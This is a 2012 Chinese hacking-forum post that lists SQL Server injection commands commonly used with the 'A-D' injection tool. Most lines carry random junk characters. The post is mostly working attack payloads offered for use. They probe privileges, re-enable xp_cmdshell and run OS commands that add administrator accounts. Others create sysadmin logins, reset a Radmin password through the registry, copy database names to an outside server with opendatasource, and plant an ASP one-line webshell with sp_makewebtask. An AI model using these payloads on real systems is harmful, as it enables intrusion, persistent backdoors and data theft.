找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1943|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令
% r) D4 H8 U' l& r2 ~//看看是什么权限的# @0 d$ \" T( Q/ S. B' V7 k& B9 E
and 1=(Select IS_MEMBER('db_owner'))
9 u  `% w, g; l9 m: z) UAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
' v9 c' W# @1 b4 e3 ~- t' K* x) {+ r; r  _
//检测是否有读取某数据库的权限
/ A6 r% u& n+ e4 Q) _8 O" X: f8 \and 1= (Select HAS_DBACCESS('master'))5 N( G7 P$ Q$ `4 q1 a
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --" \0 u  e* J0 Y

) Z/ o8 P1 w) j' q  U
" y5 L' i  M4 f9 x( ^: C数字类型
) t0 N' X( O' A9 @8 y  [9 @# gand char(124)%2Buser%2Bchar(124)=0
+ ?) t9 m- X3 v, i( e9 x9 E% ^1 C6 ^2 z2 K
字符类型
( j2 l5 B7 S/ m! l' K9 r# R' and char(124)%2Buser%2Bchar(124)=0 and ''='
! M" v! \9 N& p" Q) }. p! V: X8 {( ]4 O+ Z8 o5 Q
搜索类型, a4 C9 p5 R& a" ^/ J7 ?" J
' and char(124)%2Buser%2Bchar(124)=0 and '%'='& g" i+ K$ b, W

; j/ \% t& J3 H3 i/ b& i* B爆用户名: X6 m& R" T, |% h# b5 E0 W
and user>0
/ f  _' \) J: M. G* `; n- A' and user>0 and ''='; @, c# i6 V  D* S' {% M2 x( j
- N, g9 b# ?9 y0 I# }- S3 i7 V
检测是否为SA权限7 }2 l! U, g0 X# Z9 x
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
+ Y9 Z4 I% U7 G7 Z5 j& b/ @, gAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --" E, t+ k7 o2 @
: ]1 u3 G, T7 F; b' r
检测是不是MSSQL数据库  d" O7 x6 K; a  h8 z
and exists (select * from sysobjects);--
5 ]! r  s  x# N4 b8 v, z$ n, R7 v9 u! g9 K. ?0 v1 {
检测是否支持多行
! z( r+ R- H& ~;declare @d int;-- 8 Q. l. H5 w3 V

% V* J4 h$ Q; o- X恢复 xp_cmdshell
0 ^5 {& s% k! D! a6 O7 p) r+ A;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--3 I& g# O( t- w4 n9 _0 l  {

5 {  K- J' O% Z: w& {
( B+ w3 {& t8 M9 `& c; nselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
9 d4 h, G$ V# X+ D8 D4 E0 h6 Y4 h) N- N! L  z' L" J
//-----------------------
. x" _" u& b  w2 e//      执行命令
: h+ e- y! g" G- C0 C* C4 Z//-----------------------
, J7 J2 D  i: a* C7 J; |! ^首先开启沙盘模式:( P# u! C2 S% f: a# p5 k+ q9 z
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',18 Q! _; [# c% q! b$ Y

. Z7 N" a6 T0 z/ V$ z* |然后利用jet.oledb执行系统命令/ A* D2 J# x  e0 ~! a
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
/ h0 Q+ E) Z" k! p; ~$ G) i7 u4 ^, D$ Q9 H* j
执行命令4 ]) Y, e4 Z* T7 H5 @# z- @
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--, k, @- W# K# f( W, Z  a

) |* u" O) ?% Q0 f3 x! `: bEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'- `2 {% A  Q4 i: v8 a# W9 k1 T

4 u) e6 m4 X  K' ?9 W# U判断xp_cmdshell扩展存储过程是否存在:! F. v/ H4 T8 F9 o
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')9 O8 b0 V. a& z0 t2 l: ]
  t6 g' d. T  u# B6 [
写注册表$ h' W3 {8 O) ~. O, F
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1, n% W' w% B0 C3 V) w: Y" T
  E2 H5 c1 T) [& ^# p
REG_SZ8 b) t3 A/ A. E- [; n, B

6 U. e) T' T0 n+ s" F  \: l3 Z读注册表
& @% |1 F2 Z7 K; t1 ^, `% eexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'' x5 M/ _* U( U

6 O* `. _$ l7 i读取目录内容
* B- b% l  I/ r! X& k1 _" Yexec master..xp_dirtree 'c:\winnt\system32\',1,1
" N2 D$ m: j4 }: o9 G1 I- O: H/ [$ `: d

8 w- H' d  Z( a/ |数据库备份5 L; n) p2 `9 u* e! }4 `
backup database pubs to disk = 'c:\123.bak'
" N. Z# F, {, `) T
0 R3 k, O; o& n  L' ?* k//爆出长度
4 Q' N. @1 e6 {4 f' A0 W; J0 o; A8 WAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--4 e9 L( i4 S9 ^. ]! C0 E

( X1 |. M2 p% e( r- O0 Y- e/ M+ G$ d% F6 T7 |+ _3 B: }, N3 Q
% Z; U  J$ f1 q/ O2 `
更改sa口令方法:用sql综合利用工具连接后,执行命令:/ V+ z4 ]2 b4 Y/ p* @
exec sp_password NULL,'新密码','sa', @% I/ G7 T) n  Y7 {2 u
& c4 B' K  W: v4 R! V
添加和删除一个SA权限的用户test:
% i9 w( j& i  {# Rexec master.dbo.sp_addlogin test,ptlove
$ T" i: A4 W, j# T$ Cexec master.dbo.sp_addsrvrolemember test,sysadmin% t  x# q, C% L5 q  M- q: O
: A1 ?( `( Y$ J4 T& p# l  ^4 z0 `
删除扩展存储过过程xp_cmdshell的语句: 9 _2 _& s: y4 q
exec sp_dropextendedproc 'xp_cmdshell'
! g+ K8 Z5 i) u  Z' T" ~1 }0 J9 Y0 C9 [% c' u
添加扩展存储过过程
. M8 g' ~# U- M- L) F9 e$ z0 {EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
1 ~# X( w) B7 ~+ x$ i+ R  xGRANT exec On xp_proxiedadata TO public
2 u% I; M- L7 Y& c( I6 v' ~
- x9 }# l: d# Z: p; g( M, j5 Y7 v, b( X- i7 ^
停掉或激活某个服务。
& t. L; d- g0 L3 o0 e9 A* G. b$ T+ Z6 Q9 A7 c; f& O( v& y0 y& D
exec master..xp_servicecontrol 'stop','schedule'
4 h9 P2 }3 v- f7 e8 ]" D0 g1 e! `& I/ sexec master..xp_servicecontrol 'start','schedule'- b' O2 U. _. n+ K- U" _: g
& n9 x4 E; m. s
dbo.xp_subdirs# v5 J0 n6 S; w# v8 H3 J; y

6 s/ @6 ^# J( C6 }1 Y9 H! R只列某个目录下的子目录。
- u3 h0 j7 z. Bxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
: g8 e8 m: o; |2 |: a- O
0 b& f) R7 M  f  j9 V' F' u0 a" Sdbo.xp_makecab! k4 A, p) ?4 n5 b. w3 P3 u  A) s
( ]' V! G" w3 U5 Y  v9 u: w- d' [
将目标多个档案压缩到某个目标档案之内。
, z4 ~' u/ A; ^2 G" w所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
: f; F' [2 P+ G5 d; G* I. s8 P, `) ^
dbo.xp_makecab' p5 M: G# v+ `" f; P
'c:\test.cab','mszip',1,
2 S" y- a4 y. M: R'C:\Inetpub\wwwroot\SQLInject\login.asp',
- N+ ]) w! W3 V, N6 K' S  }'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'. b# j2 ^& C$ m1 v) C' u# @

* Q$ h5 t% X  f- i0 uxp_terminate_process
5 F% @: \6 E6 y' d6 `1 ^% j! s: V9 F) q
停掉某个执行中的程序,但赋予的参数是 Process ID。# }3 u5 `+ _( V
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID# h: B; S4 T+ ?4 L

- S5 `. X+ W6 ]1 |$ e! jxp_terminate_process 2484
3 x) Q; Q! `6 e. N7 G3 J
; o1 ~- b& d- v( \2 dxp_unpackcab
$ [# Y  I$ X$ \( A& a
4 n1 ~1 |! [  k' A0 P9 _, ~5 n. k解开压缩档。
  ^4 a6 e/ D: L. b3 U; H# G6 G, D6 ]
xp_unpackcab 'c:\test.cab','c:\temp',1" L' H0 T8 c* f

4 d9 q: ~' h" F/ w0 y) h# r' v+ f4 C5 P+ J! g% b$ [6 Z
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12345 |% n2 S/ D) M& Z

! _7 B6 a6 z  Rcreate database lcx;3 ~7 T! ^6 y( b: G' Q
Create TABLE ku(name nvarchar(256) null);8 F# y. ~; a/ f/ Z% E% p
Create TABLE biao(id int NULL,name nvarchar(256) null);4 b+ D# _/ \9 e2 n, G! v* z

! i" r+ \0 I' O# u5 S) J) h//得到数据库名
, M  t2 w0 ^3 b' M8 L2 Einsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases, t. }' k: W4 |1 y

( B' e' q5 C9 S) o$ G4 Q$ A. }( w/ K1 `9 @
//在Master中创建表,看看权限怎样
3 @& t3 H! k4 F6 b4 K0 l: lCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
$ D$ ]: A  A4 |: D
4 C* Q0 J: C4 O, K$ b+ \用 sp_makewebtask直接在web目录里写入一句话马:
1 y9 w4 Z# X) q0 Y6 W* L1 N( l& h; Phttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
5 e) a. Q0 e1 V2 f6 v+ R) a
( n8 b# n- e' M- ~. \( I# c4 q4 G//更新表内容) W& Z# A- P4 H% d  k# r
Update films SET kind = 'Dramatic' Where id = 123
/ R* Y+ c+ J7 ^8 E3 l4 j9 w: @
  K2 i" R/ e% S! h7 h6 T5 K6 g//删除内容
7 _0 b1 M( [  i+ }delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表